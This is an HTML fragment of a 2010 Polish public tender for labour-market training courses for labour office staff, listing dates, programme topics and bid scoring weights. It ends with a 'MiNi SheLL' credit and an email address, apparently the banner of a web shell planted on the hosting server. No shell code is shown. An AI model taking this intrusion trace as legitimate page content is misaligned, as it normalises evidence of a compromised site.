- I grupa: od 20.09.2010r. do 22.09.2010r.

- II grupa: od 27.09.2010r. do 29.09.2010r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Doświadczenie w przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert zgodnie z rozdziałem VII ppkt 2.1 SIWZ - 20</li>
<li>3. Certyfikat systemu zarządzania jakością kształcenia/szkolenia, lub inny równoważny znak jakościowy, akredytacja kuratora oświaty dla szkoleń - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monitorowanie rynku pracy oraz wykorzystywanie badań rynku pracy w celu zwiększenia efektywności aktywizacji bezrobotnych przez kluczowych pracowników Urzędu Pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
Przedmiotem zamówienia jest organizacja i przeprowadzenie trzydniowego szkolenia
 Monitorowanie rynku pracy oraz wykorzystywanie badań rynku pracy w celu zwiększenia efektywności aktywizacji bezrobotnych przez kluczowych pracowników Urzędu Pracy dla dwóch grup (o tej samej tematyce) po max 10 osób, poza miastem Gniezno.
Celem szkolenia jest przekazanie praktycznej wiedzy i umiejętności w zakresie monitoringu, analizy rynku pracy oraz efektywnego korzystania z wyników badań dot. rynku pracy.
Zakres programowy szkolenia
- procesy zachodzące na współczesnym rynku pracy;

- podaż i popyt na lokalnym rynku pracy;
- istota i cele badań;
- źródła pozyskiwania danych dot. rynku pracy, potrzeb zatrudnieniowych pracodawców;
- tworzenie aktualizacji i analizy danych na podstawie zgromadzonych informacji o lokalnym rynku pracy;
- budowa planu szkoleń w oparciu o rzeczywiste potrzeby rynku pracy;
- wykorzystywanie badań rynku pracy w celu skutecznej aktywizacji bezrobotnych;
- segmentacja kandydatów do pracy i pracodawców.
Ponadto program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych
i modułowy program szkolenia dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl w zawodzie pośrednik pracy, doradca zawodowy, specjalista ds. rozwoju zawodowego, lider klubu pracy w zakresie danych o rynku pracy i ich wykorzystywania.
Termin wykonania zamówienia: Zamawiający wymaga, aby szkolenie zostało przeprowadzone w dwóch grupach:
- I grupa: od 18.10.2010r. do 20.10.2010r.
- II grupa: od 25.10.2010r. do 27.10.2010.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Doświadczenie w przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert zgodnie z rozdziałem VII ppkt 2.1 SIWZ - 20</li>
<li>3. Certyfikat systemu zarządzania jakością kształcenia/szkolenia, lub inny równoważny znak jakościowy, akredytacja kuratora oświaty dla szkoleń - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com